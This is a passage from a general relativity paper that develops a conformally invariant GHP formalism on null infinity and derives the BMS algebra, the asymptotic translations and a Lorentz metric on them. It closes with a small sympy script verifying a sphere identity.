remains unchanged. This is the ``universal structure tensor'' as defined by Geroch~\cite{Geroch:1977}. It is closely related to the ``strong conformal geometry'' defined by Penrose~\cite{Penrose:1986} which is essentially the ``square root'' of the tensor. Its relevance becomes clearer when one considers a generator of $\mathscr{I}$ with tangent vector $N^a$ and associated parameter $u$ defined by $\mathrm{d} u(N)=1$. The parameter is called the Bondi time and it measures the retarded time along that generator. Under a change of conformal factor it changes according to $\mathrm{d} u \mapsto \mathrm{d} \hat{u} = \Theta \mathrm{d} u$. At the same time, the length $\mathrm{d} l(v)=\sqrt{-g_{ab}v^av^b}$ of any vector $v^a$ tangent to a cut through the generator changes by the same factor $\Theta$ so that the ratio $\mathrm{d} l:\mathrm{d} u$ is unchanged. This is a remnant of the fact that, in relativity, space and time intervals do not have independent meaning. The spatial and temporal scales are tied together by the constant speed of light. At every point outside of $\mathscr{I}$ this is encoded in the Lorentzian signature of the metric. But restricted to $\mathscr{I}$ where the metric is degenerate this fundamental fact of Einstein's theory is still maintained in the form of this ratio and its conformal invariance.
Having set up the null tetrad we are now in a position to discuss the implications for the spin-coefficients on $\mathscr{I}$. The first obvious consequences follow from the fact that $\mathscr{I}$ is a null hypersurface: it is generated by a null geodetic congruence tangent to $n^a$ so that on $\mathscr{I}$ the equations $\kappa'=0$ and $\bar\rho' = \rho'$ must hold. The fact that we aligned $m^a$ with the 2-surfaces of constant $s$ implies that also $\bar\rho=\rho$ on $\mathscr{I}$. More information can be gleaned from the asymptotic Einstein condition~\eqref{eq:4} which after inserting $\nabla_a\Omega = -A n_a + \Omega X_a$ can be rewritten as
\[
\nabla_a A n_b + A \nabla_a n_b - A n_a X_b = g_{ab} X + \Omega X_{ab}
\]
where the fields $X$, $X_a$ and $X_{ab}=X_{ba}$ are some irrelevant smooth fields on $M$. Taking components and evaluating the combinations which are free of any $X$ fields on $\mathscr{I}$ yields the equations
\[
\begin{gathered}
\kappa' = 0, \qquad \sigma'=0,\qquad \bar\rho' = \rho',\\
\thorn' A + \rho' A = 0 , \qquad \eth A = 0.
\end{gathered}
\]
The next set of equations comes from the curvature equations which relate the curvature to derivatives of the spin-coefficients. Those equations which are intrinsic to $\mathscr{I}$ are
\begin{align}
\label{eq:7}
\thorn' \rho' - \rho'^2 &= \Phi_{22}, \\
\label{eq:8}
\etp\rho' &= \Phi_{21}, \\
\label{eq:9}
\eth\rho - \etp \sigma &= \Phi_{01}, \\
\label{eq:10}
\thorn' \sigma - \rho' \sigma - \eth\tau + \tau^2 &= -\Phi_{02}, \\
\label{eq:11}
\thorn'\rho - \rho\rho' + 2 \Lambda &= \etp\tau - \tau{\bar\tau}.
\end{align}
Note, that a consequence of~\eqref{eq:11} is that
\[
\etp\tau = \eth {\bar\tau}.
\]
The commutators between the three operators also contain information about the spin-coefficients. Restricted to $\mathscr{I}$, and acting on a GHP scalar with weights $(p,q)$, they are
\begin{align}
\thorn'\eth - \eth\thorn' &= \rho'\eth - \tau \thorn' - p (\rho'\tau - \Phi_{12}),\label{eq:12}\\
\thorn'\etp - \etp\thorn' &= \rho'\etp - {\bar\tau} \thorn' - q (\rho'{\bar\tau} - \Phi_{21}),\label{eq:13}\\
\eth\etp - \etp\eth &= - (p - q) K,\label{eq:14}
\end{align}
where $K=\Phi_{11} + \Lambda -\rho\rho' = \bar{K}$ is the remnant of the complex curvature on $\mathscr{I}$, where in fact it is real.
Finally, we need the relevant Bianchi identities. The Bianchi identity in the physical space-time yields equations for the rescaled Weyl spinor components $\psi_i$ in terms of the spin-coefficients which look superficially like a zero-rest-mass field equation for a spin-2 field. The Bianchi identity in the conformal space-time leads to equations for the Ricci components in terms of the Weyl scalars. Explicitly, the relevant equations intrinsic to $\mathscr{I}$ are
\begin{itemize}[wide]
\item the intrinsic propagation equations along $\mathscr{I}$ for $\psi_{ABCD}$
\begin{align}
\thorn' \psi_0 - \rho' \psi_0 - \eth \psi_1 + 4 \tau \psi_1 &= 3 \sigma \psi_2,\label{eq:15}\\
\thorn' \psi_1 - 2\rho' \psi_1 - \eth \psi_2 + 3 \tau \psi_2 &= 2 \sigma \psi_3,\label{eq:16}\\
\thorn' \psi_2 - 3\rho' \psi_2 - \eth \psi_3 + 2 \tau \psi_3 &= \sigma \psi_4,\label{eq:17}\\
\thorn' \psi_3 - 4\rho' \psi_3 - \eth \psi_4 + \tau \psi_4 &= 0\label{eq:18},
\end{align}
\item and the intrinsic propagation equations along $\mathscr{I}$ for the Ricci components in terms of the $\psi$'s
\begin{align}
\thorn' \Phi_{00} - \etp \Phi_{01} + 2 \mbox{\th} \Lambda &= -2 \tau \Phi_{10} - 2 {\bar\tau} \Phi_{01} + \rho' \Phi_{00} + {\bar\sigma} \Phi_{02} + 2 \rho \Phi_{11} + A \psi_2, \label{eq:19}\\
\thorn' \Phi_{01} - \etp \Phi_{02} + 2 \eth\Lambda &= - 2\tau \Phi_{11} - {\bar\tau} \Phi_{02} + 2\rho' \Phi_{01} + 2 \rho \Phi_{12} ,\label{eq:20}\\
\thorn' \Phi_{01} - \eth \Phi_{11} + \eth\Lambda &= -2 \tau \Phi_{11} - {\bar\tau} \Phi_{02} + \rho' \Phi_{01} + \sigma \Phi_{21} + \rho \Phi_{12} + A {\bar\psi}_3,\label{eq:21}\\
\thorn' \Phi_{11} - \etp \Phi_{12} + \thorn'\Lambda &= - {\bar\tau} \Phi_{12} - \tau \Phi_{21} + 2 \rho' \Phi_{11} + \rho \Phi_{22} ,\label{eq:22}\\
\thorn' \Phi_{20} - \etp \Phi_{21} &= -2 {\bar\tau} \Phi_{21} + \rho' \Phi_{20} + {\bar\sigma} \Phi_{22} + A \psi_4,\label{eq:23}\\
\thorn' \Phi_{21} - \etp \Phi_{22} &= - {\bar\tau} \Phi_{22} + 2 \rho' \Phi_{21} .\label{eq:24}
\end{align}
\end{itemize}
There are no equations for $\thorn'\psi_4$ and $\thorn'\Phi_{22}$. Strictly speaking, \eqref{eq:19} is not intrinsic since it contains $\mbox{\th}\Lambda$; however, it is a complex equation and its imaginary part is intrinsic. Furthermore, we have two equations for $\thorn'\Phi_{01}$, which can be combined into a ``propagation equation'' and a ``constraint equation''.
Since we have values for all the Ricci components except $\Phi_{00}$ and $\Phi_{11}$, we expect that all equations containing only the known components either give us relations between the remaining spin-coefficients or are satisfied identically. For instance, \eqref{eq:24} is easily seen to be an identity once we insert the values on $\mathscr{I}$.
We will come back to these equations after we have developed some more background.
\section{The conformal GHP formalism}
\label{sec:conf-ghp-form}
Since the existence of $\mathscr{I}$ is due to the conformal compactification of a physical space-time with a conformal factor that is fixed only up to the multiplication with a positive function the entire physical content on $\mathscr{I}$ must be invariant under conformal rescalings. This property is usually exploited by choosing a conformal gauge, i.e., by fixing the conformal factor so that calculations simplify. We will proceed here in a different way and maintain the conformal invariance in all our operations. To this end we need to introduce conformally weighted quantities and conformally invariant derivative operators (see~\cite{Penrose:1984a}).
We call $\eta$ a \emph{conformal density of weight} $w$ if it changes under the change $\Omega\mapsto\Omega \Theta$ by $\eta \mapsto \Theta^w \eta$. Since we are using the GHP formalism, which partially implements a frame invariance, such quantities $\eta$ will in general also be GHP weighted. We denote the weights of a conformally weighted GHP quantity $\eta$ in the form $[w;p,q]$. In order to incorporate the conformal invariance within the GHP formalism one needs to decide how the null tetrad transforms under conformal rescaling. Here, the most natural choice is to map
\[
l^a \mapsto \Theta^{-2}l^a,\qquad
m^a \mapsto \Theta^{-1}m^a,\qquad
n^a \mapsto n^a.
\]
Even for a conformal density $\eta$ the derivatives $\thorn' \eta$ and $\eth \eta$ will not be conformal densities. Instead we find for $\eta$ of weights $[w;p,q]$ that
\[
\begin{aligned}
\thorn' \eta &\mapsto \Theta^w(\thorn' \eta + (w+p+q) D'\theta \, \eta), \\
\eth \eta &\mapsto \Theta^{w-1}(\eth \eta + (w+q) \delta\theta \, \eta), \\
\etp \eta &\mapsto \Theta^{w-1}(\etp \eta + (w+p) \delta'\theta \, \eta).
\end{aligned}
\]
where we have defined $\theta = \log\Theta$. In order to obtain conformal densities one needs to eliminate the derivatives of $\theta$. To this end one uses the inhomogeneous transformation behaviour of some of the spin-coefficients, in this case of $\tau$ and $\rho'$, which transform according to
\[
\tau \mapsto \Theta^{-1}(\tau - \delta \theta), \quad \rho' \mapsto \rho' - D'\theta.
\]
Combining these two inhomogeneous behaviours leads to the introduction of the conformally invariant GHP operators acting on a quantity $\eta:[w;p,q]$
\begin{align}
{\thorp_c} \eta &= \thorn' \eta + (w + p + q)\rho' \eta,\label{eq:25}\\
\ethc \eta &= \eth \eta + (w + q)\tau \eta,\label{eq:26}\\
\etbc \eta &= \etp \eta + (w + p){\bar\tau} \eta.\label{eq:27}
\end{align}
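As a consistency check one can verify directly, using only the transformation rules listed above, that ${\thorp_c}$ maps conformal densities to conformal densities. For $\eta:[w;p,q]$,
\[
{\thorp_c}\eta \mapsto \Theta^w\bigl(\thorn' \eta + (w+p+q) D'\theta\, \eta\bigr) + (w+p+q)\bigl(\rho' - D'\theta\bigr)\Theta^w \eta = \Theta^w\, {\thorp_c}\eta,
\]
so that ${\thorp_c}\eta$ is again a conformal density of weight $w$. The analogous checks for $\ethc$ and $\etbc$ proceed in the same way, using the transformations of $\tau$ and ${\bar\tau}$ to absorb the $\delta\theta$ and $\delta'\theta$ terms.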
Note that in the context of $\mathscr{I}$ there is no need to consider $\mbox{\th}_c$ since it is an outward derivative. Similarly, we do not need the conformal $\etp_c$ operator. This would be defined in terms of $\tau'$, which is also an extrinsic quantity, being defined in terms of the parallel transport of $n^a$ along $l^a$ away from $\mathscr{I}$. Thus, the two derivatives transverse to the generators but tangent to $\mathscr{I}$ are represented by $\ethc$ and its complex conjugate $\etbc$, \emph{which is not the same as $\etp_c$}.
For $\eta$ a conformal density of weight $w$ the derivatives have weights
\[
{\thorp_c}\eta : [w;p-1,q-1], \quad
\ethc\eta : [w-1;p+1,q-1], \quad
\etbc\eta : [w-1;p-1,q+1].
\]
Next, we need the commutators among these operators. Some calculation yields the rather simple result which holds on $\mathscr{I}$ (i.e., with $\sigma' = 0 = \kappa' = \rho' - {\bar\rho}'$)
\begin{align}
[{\thorp_c},\ethc]\eta &= (w + q) \mathcal{P} \eta, \label{eq:28}\\
[{\thorp_c},\etbc]\eta &= (w + p) \overline{\cP} \eta, \label{eq:29}\\
[\ethc,\etbc]\eta &= -(p-q) \mathcal{Q} \eta. \label{eq:30}
\end{align}
The commutators define the \emph{quantities}
\begin{equation}
\mathcal{P} := \thorn'\tau - \eth\rho', \qquad \mathcal{Q} := K - \etp\tau = \overline{\cQ},\label{eq:31}
\end{equation}
which are conformal densities $\mathcal{P}:[-1;0,-2]$, $\overline{\cP}:[-1;-2,0]$ and $\mathcal{Q}:[-2;0,0]$. Recall that on $\mathscr{I}$ both $K$ and $\etp\tau$ are real. While they are not conformally invariant individually, their combination is. Similarly, the individual terms defining $\mathcal{P}$ are not conformally invariant but their combination is a conformal density. This can be checked explicitly by going through the individual transformations.
Finally, we evaluate the Jacobi identity for these operators in order to get equations between these commutator quantities. There is only one non-trivial combination to consider, namely
\[
[{\thorp_c},[\ethc ,\etbc]] + [\ethc,[\etbc ,{\thorp_c}]] + [\etbc,[{\thorp_c} ,\ethc]] = 0.
\]
Evaluating the three terms acting on an arbitrary conformal density $\eta:[w;p,q]$ yields
\[
(w+q)\left[\etbc\mathcal{P} + {\thorp_c}\mathcal{Q}\right] - (w+p) \left[\ethc \overline{\cP} + {\thorp_c}\mathcal{Q}\right] = 0.
\]
Since this holds for all $\eta$, i.e., for all weights, we get the equations
\begin{equation}
\label{eq:32}
{\thorp_c}\mathcal{Q} + \etbc\mathcal{P} = 0, \qquad {\thorp_c}\mathcal{Q} + \ethc \overline{\cP} = 0
\end{equation}
with the consequence that $\ethc \overline{\cP} = \etbc\mathcal{P}$.
We now return to the equations which are implied on $\mathscr{I}$. It is easily verified that $\sigma$ is a conformal density with weights $[-2;3,-1]$. Also, the factor $A$ is a conformal density with weights $A:[-1;1,1]$ satisfying the equations
\[
{\thorp_c} A = 0, \qquad \ethc A = 0
\]
on $\mathscr{I}$.
The components of the rescaled Weyl tensor are all conformal densities with weights
\[
\psi_k : [k-5;4-2k,0]
\]
and the equations relating them can be written in terms of the conformal derivative operators as
\begin{equation}
{\thorp_c} \psi_k - \ethc \psi_{k+1} = (3-k) \sigma \psi_{k+2}, \qquad k=0,\dots,3.\label{eq:33}
\end{equation}
The Ricci components are not immediately conformal densities and their equations cannot simply be rewritten in a conformally invariant form. However, some of them correspond to equations just derived. Consider for instance~\eqref{eq:22}. Inserting the values for the Ricci components from (\ref{eq:7}--\ref{eq:10}) yields
\[
\begin{multlined}
\thorn' \Phi_{11} + \thorn'\Lambda - 2 \rho' \Phi_{11} = \etp \eth\rho' - {\bar\tau} \eth\rho' - \tau \etp\rho' + \rho \thorn'\rho' - \rho\rho'^2 \\
= \etp \eth\rho' - {\bar\tau} \eth\rho' - \tau \etp\rho' + \thorn'(\rho \rho') -\rho'\etp\tau + \rho'\tau{\bar\tau} + 2 \rho'\Lambda - 2 \rho\rho'^2
\end{multlined}
\]
which can be rewritten in the form
\[
\thorn' (\Phi_{11} + \Lambda -\rho\rho') - 2 \rho' (\Phi_{11} + \Lambda - \rho\rho') = \etp \eth\rho' - {\bar\tau} \eth\rho' - \tau \etp\rho' - \rho'\etp\tau + \rho'\tau{\bar\tau}.
\]
Adding the terms $\thorn'\etp\tau - 2\rho'\etp\tau$ on both sides and using the $[\thorn',\etp]$ commutator yields the second equation in~\eqref{eq:32}.
\section{Cut systems of null infinity}
\label{sec:cut-systems-null}
It is clear from what was discussed so far that the only non-trivial GHP spin-coefficients on $\mathscr{I}$ are $\rho$, $\sigma$, $\rho'$ and $\tau$. The first two give information which is extrinsic to $\mathscr{I}$ in the sense that they tell us about the shape of the outgoing null hypersurfaces intersecting $\mathscr{I}$ in the cuts of constant $s$. The role of $\sigma$ is closely tied to the gravitational radiation which arrives at infinity. While $\rho$ and $\sigma$ describe dynamical properties, the other two spin-coefficients, $\rho'$ and $\tau$, are intrinsic to $\mathscr{I}$ and describe its non-dynamical, kinematical structure. Clearly, $\rho'$ determines the conformal gauge in the sense that, given its value on $\mathscr{I}$, one can recreate the conformal factor $\Theta$ from its value at a single cross-section by solving the equation ${\thorp_c}\Theta=0$. But what is the meaning of $\tau$?
Recall our assumption that there exists a function $s$ on $\mathscr{I}$ such that its level surfaces are regular cross-sections of $\mathscr{I}$ and that the frame is adapted to the cuts so that $\delta s = 0$. We take $s$ to be a scalar, i.e., having weights $[0;0,0]$ and consider the commutator
\[
[\thorn',\eth]s = \thorn'\eth s - \eth\thorn' s = \rho' \eth s - \tau \thorn' s
\]
which implies that $\tau = \eth\thorn' s/\thorn' s$. Since $\eth A=0$ we can just as well write $\tau = \eth(A\thorn' s)/(A\thorn' s)$. The quantity $A\thorn' s = N^a\nabla_as = \mathrm{d} s/\mathrm{d} u$ is therefore the change of $s$ along the null generators with respect to the Bondi time $u$ which is distinguished by the conformal gauge in operation. It turns out that the more natural quantity to use is the reciprocal $\alpha = \mathrm{d} u/\mathrm{d} s$. Since $\mathrm{d} u = \alpha \mathrm{d} s$ we may call it the \emph{null lapse}, relating the two notions of time along the null generators. Then $\tau$ describes the change in the passage of Bondi time between two different $s$-cuts, $\tau=0$ indicating that the changes in $u$ and $s$ are proportional across a cut.
The null lapse $\alpha$ is a conformal density with weights $[1;0,0]$ and, since $\tau = \eth(A\thorn' s)/(A\thorn' s) = -\eth\alpha/\alpha$, it satisfies the equation $\ethc\alpha = \eth \alpha + \tau \alpha = 0$. Consider now the commutator
\[
{\thorp_c}\ethc \alpha - \ethc{\thorp_c} \alpha = - \ethc {\thorp_c} \alpha = \mathcal{P} \alpha.
\]
This equation determines $\mathcal{P}$ in terms of the chosen system of cuts
\begin{equation}
\label{eq:34}
\mathcal{P} = - \ethc ({\thorp_c} \alpha/\alpha).
\end{equation}
The other quantity $\mathcal{Q} = K - \etp\tau$ is mostly determined by the geometry of the cuts, since $K$ here is real and therefore equals one half of the Gauß curvature of the cuts. The conformal correction term $\etp\tau$ brings in information about the cut system.
The vanishing of $\mathcal{P}$ is the integrability condition for the simultaneous equations $\rho' = \thorn' \theta$ and $\tau = \eth\theta$. Thus, when $\mathcal{P}=0$ we can find a conformal factor $\Theta$ such that both $\rho'$ and $\tau$ vanish after a conformal rescaling. If $\mathcal{P}$ does not vanish, then only one of those quantities can be made to vanish. This is usually taken to be the convergence $\rho'$ whose vanishing indicates that the metrics induced on the cuts all agree. The remaining non-vanishing of $\tau$ then implies that the chosen cuts are not Bondi cuts, i.e., do not belong to a Bondi system.
In the remainder of the paper we will occasionally refer to two special gauges. The first is what we call the \emph{cylinder gauge} which is characterised by the vanishing of $\rho'$ and choosing the unit-sphere metric as the common metric of the $s$-cuts, so that $K=\frac12$ is constant. The other gauge that we use is a Bondi system which makes the additional assumption that $\tau=0$, i.e., that the null lapse is constant across a cut.
\section{The BMS algebra}
\label{sec:bms-algebra}
An important role in the discussion of the structure of $\mathscr{I}$ is played by its invariance group, the so-called BMS group. This is the group of diffeomorphisms of $\mathscr{I}$ which leave the universal structure tensor~\eqref{eq:6} invariant. Here, we determine its algebra, i.e., the Lie algebra $\mathscr{B}$ of infinitesimal BMS generators, as the vector fields $X^a$ on $\mathscr{I}$ for which
\[
\Lie{X}{\Gamma_{ab}{}^{cd}} = 0.
\]
We write a general vector field $X^a$ as a linear combination of the tetrad vectors tangent to $\mathscr{I}$
\[
X^a = \eta n^a + {\bar\xi} m^a + \xi \overline{m}^a,
\]
where $\eta$ and $\xi$ are conformal densities $\eta:[0;1,1]$ and $\xi:[1;1,-1]$.
A short calculation yields the expressions
\begin{equation}
\label{eq:35}
\begin{aligned}
\Lie{X}{g_{ab}} &= - g_{ab} \left( \etp \xi + \eth {\bar\xi} - 2\rho'\eta \right) - 2 \overline{m}_a \overline{m}_b\eth \xi - 2 m_a m_b\etp {\bar\xi} \\
&\qquad\qquad+ 2l_{(a}\overline{m}_{b)} \left(\thorn' \xi + \rho' \xi \right) + 2l_{(a}m_{b)} \left(\thorn' {\bar\xi} + \rho' {\bar\xi} \right) ,\\
\Lie{X}{N^a} &= \left( \eta \thorn' A - A \thorn' \eta + A \tau {\bar\xi} + A {\bar\tau} \xi \right) n^a - A \left( \thorn' {\bar\xi} + \rho' {\bar\xi} \right) m^a - A \left( \thorn' \xi + \rho' \xi \right) \overline{m}^a.
\end{aligned}
\end{equation}
The invariance of $\Gamma_{ab}{}^{cd}$ implies that
\[
\Lie{X}{g_{ab}} N^c + 2 g_{ab} \,\Lie{X}{N^c} = 0.
\]
Thus, $\Lie{X}{g_{ab}} \propto g_{ab}$ and $\Lie{X}{N^a} \propto N^a$ so that the off diagonal terms in $\Lie{X}{g_{ab}}$ must vanish as do the terms in $\Lie{X}{N^a}$ not proportional to $n^a$. This means that we get the equations
\[
\thorn' \xi + \rho' \xi = 0, \qquad \eth\xi = 0
\]
together with
\[
A\etp \xi + A\eth {\bar\xi} - 2\rho'\eta + 2 (\eta \thorn' A - A \thorn' \eta + A \tau {\bar\xi} + A {\bar\tau} \xi ) = 0.
\]
Taken together we find that a BMS generator $X^a$ is represented by a pair of two conformal densities $X=(\xi,\eta_\xi)$ subject to the equations
\begin{equation}
\label{eq:36}
\ethc\xi = 0, \qquad {\thorp_c}\xi = 0, \qquad {\thorp_c}\eta_\xi = \frac12\left( \etbc\xi + \ethc{\bar\xi}\right).
\end{equation}
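As an illustration, consider these equations in a Bondi system, where $\rho'=0$ and $\tau=0$: inserting the weights $\xi:[1;1,-1]$ and $\eta_\xi:[0;1,1]$ into (\ref{eq:25}--\ref{eq:27}), the conditions~\eqref{eq:36} reduce to
\[
\eth\xi = 0, \qquad \thorn'\xi = 0, \qquad \thorn'\eta_\xi = \frac12\left( \etp\xi + \eth{\bar\xi}\right),
\]
so $\xi$ is a conformal Killing vector on the sphere of generators, constant along the generators, while $\eta_\xi$ changes linearly in Bondi time, recovering the familiar description of the BMS generators in the Bondi gauge.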
Using these equations the commutator between two BMS generators $X$ and $X'$ becomes
\begin{equation}
[(\xi,\eta),(\xi',\eta')] = \left(\xi\diamond \etbc\xi, \frac12\eta\diamond \etbc\xi + \frac12\eta\diamond \ethc{\bar\xi} + \xi\diamond\etbc\eta + {\bar\xi}\diamond\ethc\eta \right)\label{eq:37}
\end{equation}
where $\alpha\diamond\beta = \alpha \beta' - \beta \alpha'$.
It is straightforward to verify that generators of the form $(0,\eta)$ (for which ${\thorp_c}\eta=0$) form a sub-algebra which is in fact an Abelian ideal $\mathscr{S}$, since $[\mathscr{B},\mathscr{S}] \subset \mathscr{S}$. The elements of $\mathscr{S}$ are called (infinitesimal) super-translations. They are represented here as conformal densities $\eta$ on $\mathscr{I}$ satisfying ${\thorp_c}\eta=0$, thus corresponding to global functions on the sphere of null generators of $\mathscr{I}$.
On the other hand, given any cut of $\mathscr{I}$ the Lie algebra of its isotropy group can be given as $(\xi,\eta_\xi)$ where $\eta_\xi$ vanishes on the cut. Each of these algebras is isomorphic to the Lie algebra $\mathfrak{so}(1,3)$ of infinitesimal Lorentz transformations, a real form of $\mathfrak{sl}(2,{\mathbb{C}})$ (see app.~\ref{sec:asympt-symm-1}). However, there is no distinguished unique sub-algebra of $\mathscr{B}$, isomorphic to the Lorentz generators.
Sachs~\cite{Sachs:1962b} has shown that the infinite dimensional ideal of super-translations contains a 4-dimensional sub-ideal $\mathscr{T}$, the (infinitesimal) translations. In the present context we can obtain this ideal by observing that $\mathscr{T}$ must be invariant under the adjoint action of $\mathscr{B}$ on $\mathscr{S}$. A generator $(\xi,\eta_\xi)\in\mathscr{B}$ acts on $(0,\eta)$ according to the adjoint action $(0,\eta)\mapsto (0,\ad_\xi\eta):=[(\xi,\eta_\xi),(0,\eta)]$ (in a blatant abuse of notation) where
\[
\ad_\xi\eta = \xi\etbc\eta - \frac12\eta\etbc\xi.
\]
A closer look reveals (see app.~\ref{sec:asympt-symm-1}) that $\mathscr{T}\subset\mathscr{S}$ is spanned by eigenvectors of $\ad_{\xi_0}$ for some generator $\xi_0$, i.e., conformal densities satisfying
\begin{equation}
\xi_0\etbc\eta - \frac12\eta\etbc\xi_0 = \lambda_0 \eta,\label{eq:38}
\end{equation}
where $\lambda_0=\pm\frac12$. This characterisation of the space of asymptotic translations is not very convenient since it makes reference to the Lorentz part $\xi$ of generators. It is possible to give another characterisation of $\mathscr{T}$ which is much more useful.
\begin{thm}
Let $R$ be the conformal density for which
\begin{equation}
\etbcR+\ethc\mathcal{Q}=0,\label{eq:39}
\end{equation}
and let $U$ be a conformal density with weights $[1;0,0]$. Then
\begin{equation}
\ethc[2]U = R U,\label{eq:40}
\end{equation}
if and only if $\eta=A U\in \mathscr{T}$.
\end{thm}
\begin{proof}[Proof]
Every $\eta\in\mathscr{T}$ is a linear combination of eigenfunctions of the operator $\ad_{\xi_0}$ defined by the left hand side of~\eqref{eq:38}. It is enough to focus only on those. Thus, we assume that $\eta$ satisfies \eqref{eq:38} with $\lambda_0=\pm\frac12$. Applying $\ethc[2]$ to this equation and using the commutator relations between $\ethc$ and $\etbc$ yields
\begin{equation}
\label{eq:41}
\xi_0\etbc\ethc[2]\eta - \frac12\ethc[2]\eta\etbc\xi_0 = \lambda_0 \ethc[2]\eta - \xi_0\ethc\mathcal{Q}\,\eta.
\end{equation}
Since $\ethc A = 0 = \etbc A$, the conformal density $U=A^{-1}\eta$ satisfies the same equation. Defining $Z:=\ethc[2]U-R U$ and inserting into~\eqref{eq:41} yields
\[
\xi_0\etbc Z - \frac12 Z\etbc\xi_0 = \lambda_0 Z - \xi_0\ethc\mathcal{Q}\, U - \xi_0\etbcR U.
\]
Since $R$ satisfies~\eqref{eq:39} the last two terms cancel, so $Z$ satisfies~\eqref{eq:38} as well. Referring to app.~\ref{sec:equat-co-curv} and noting that $Z$ has spin-weight $s=2$ implies that $Z=0$ identically. Thus, $\eta\mapsto A^{-1}\eta$ defines an injective linear map from $\mathscr{T}$ to the solution space of~\eqref{eq:40}. Since both spaces are 4-dimensional this establishes the result.
\end{proof}
Note that in view of this result we will henceforth identify $\mathscr{T}$ with the solution space of~\eqref{eq:40}, i.e., an asymptotic translation is a conformal density $U:[1;0,0]$ satisfying~\eqref{eq:40}.
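As an illustration, consider a Bondi system: there $\tau=0$ and $\mathcal{Q}=K=\frac12$ is constant on the cuts, so that
\[
\ethc\mathcal{Q} = \eth\mathcal{Q} - 2\tau\mathcal{Q} = 0.
\]
Since~\eqref{eq:39} determines $R$ uniquely (see app.~\ref{sec:equat-co-curv}), this forces $R=0$, and~\eqref{eq:40} reduces to $\eth^2 U = 0$, whose solution space is spanned by the first four spherical harmonics. This recovers the familiar description of the asymptotic translations in the Bondi gauge.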
The conformal density $R$ introduced above is closely related to the ``gauge field'' $\rho_{ab}$ defined by Geroch~\cite{Geroch:1977}. As shown in app.~\ref{sec:equat-co-curv} it is uniquely determined by the equation $\etbcR+\ethc\mathcal{Q}=0$. In view of this equation, and for lack of a better name, we call the field $R$ the \emph{co-curvature}. This equation also fixes the behaviour of the co-curvature along the null generators, as follows from the Jacobi identity~\eqref{eq:32} and
\[
\begin{multlined}
0 = {\thorp_c}(\etbcR + \ethc\mathcal{Q}) = \etbc{\thorp_c}R + 2 \mathcal{P} \mathcal{Q} + \ethc {\thorp_c}\mathcal{Q}\\ = \etbc{\thorp_c}R + 2 \mathcal{P} \mathcal{Q} - \ethc \etbc\mathcal{P} = \etbc({\thorp_c}R - \ethc\mathcal{P}).
\end{multlined}
\]
Since $\etbc$ acting on densities with weight $[-2;1,-3]$ is an isomorphism (see app.~\ref{sec:equat-co-curv}) we find
\begin{equation}
\label{eq:42}
{\thorp_c}R = \ethc\mathcal{P}.
\end{equation}
\section{The Lorentz metric on the space of translations}
\label{sec:lorentz-metric-space}
Our next problem is to define a metric on $\mathscr{T}$. This is necessary for several reasons, the most important one being that the energy-momentum is commonly defined as a co-vector on $\mathscr{T}$ and it is interpreted as a Lorentzian 4-vector. This implies that there is Lorentzian metric on $\mathscr{T}^*$, the dual space to $\mathscr{T}$ and hence also on $\mathscr{T}$. Furthermore, it is important to normalise the translations in order to fix the magnitudes of the computed energies and momenta.
A discussion of this issue is difficult to find in the literature since in the Bondi gauge the first four spherical harmonics are implicitly taken as an orthonormal Lorentzian basis for $\mathscr{T}$ with respect to which the energy-momentum vector can be computed. This is consistent with spinorial approaches to the Bondi energy-momentum based on the Nester-Witten form (see~\cite{Horowitz:1982,Szabados:2009}) where the structure of spin-space is used to define a Lorentzian metric on $\mathscr{T}$. However, at least to our knowledge there is no explicit definition of a Lorentzian metric on $\mathscr{T}$ defined as the solution space of~\eqref{eq:40}.
A hint about how to proceed in the general case can be found in a paper by Hansen, Janis et al.~\cite{Hansen:1976}, where a representation of a Minkowski vector at a point $P$ as a function on the light cone of $P$ is discussed. Given a vector $U^a$ at $P$, the authors associate a scalar $U = U^al_a$ to every null vector $l^a$ at $P$ with $t^al_a=1$, where $t^a$ is a future-pointing time-like unit-vector, the first member of an orthonormal basis at~$P$. This defines a function $U$ on the unit-sphere of null vectors $l^a$ at $P$ which automatically satisfies the equation $\eth^2U=0$. For any two vectors $U^a$ and $V^a$ at $P$ and their representative functions $U$ and $V$ on the sphere one can define\footnote{Note that the conventions regarding $\eth$ in~\cite{Hansen:1976} are different from the ones used here.}
\begin{equation}
G[U,V] = UV + U \eth\etp V + V \eth\etp U - \eth U \etp V - \eth V \etp U\label{eq:43}
\end{equation}
and, remarkably, one finds that $G[U,V]=U_aV^a$, i.e., the expression $G[U,V]$ is constant on the sphere and evaluates to the inner product between the two vectors.
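The constancy of $G[U,V]$ can also be checked directly with a computer algebra system. The following sketch (in sympy) uses one common normalisation of the spin-weighted $\eth$-operator on the unit sphere; as the footnote warns, signs and factors of $\sqrt2$ differ between conventions. It represents $U^a$ and $V^a$ by their functions $U = U^al_a$, $V=V^al_a$ with $l^a=(1,n^i)$ and signature $(+,-,-,-)$, and verifies that \eqref{eq:43} evaluates to the constant $u^0v^0-\vec u\cdot\vec v$.

```python
import sympy as sp

th, ph = sp.symbols('theta phi', positive=True)

def eth(f, s):
    # eth acting on a spin-weight-s quantity on the unit sphere
    # (one common normalisation; conventions differ by signs and sqrt(2)).
    g = sp.sin(th)**(-s) * f
    return -(sp.sin(th)**s / sp.sqrt(2)) * (sp.diff(g, th) + sp.I/sp.sin(th)*sp.diff(g, ph))

def ethp(f, s):
    # eth-prime on a spin-weight-s quantity, complex conjugate convention.
    g = sp.sin(th)**s * f
    return -(sp.sin(th)**(-s) / sp.sqrt(2)) * (sp.diff(g, th) - sp.I/sp.sin(th)*sp.diff(g, ph))

u0, u1, u2, u3 = sp.symbols('u0 u1 u2 u3', real=True)
v0, v1, v2, v3 = sp.symbols('v0 v1 v2 v3', real=True)
n = [sp.sin(th)*sp.cos(ph), sp.sin(th)*sp.sin(ph), sp.cos(th)]  # unit normal

# Representative functions U = U^a l_a, V = V^a l_a with l^a = (1, n^i):
U = u0 - (u1*n[0] + u2*n[1] + u3*n[2])
V = v0 - (v1*n[0] + v2*n[1] + v3*n[2])

# G[U,V] = UV + U eth eth' V + V eth eth' U - eth U eth' V - eth V eth' U
G = (U*V + U*eth(ethp(V, 0), -1) + V*eth(ethp(U, 0), -1)
     - eth(U, 0)*ethp(V, 0) - eth(V, 0)*ethp(U, 0))

expected = u0*v0 - u1*v1 - u2*v2 - u3*v3   # Minkowski inner product
print(sp.simplify(sp.expand(G - expected)))  # -> 0, independent of theta, phi
```

The same script can be used to confirm that $G[U,V]$ fails to be constant once $U$ contains an $\ell\ge2$ harmonic, in line with the condition $\eth^2U=0$.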
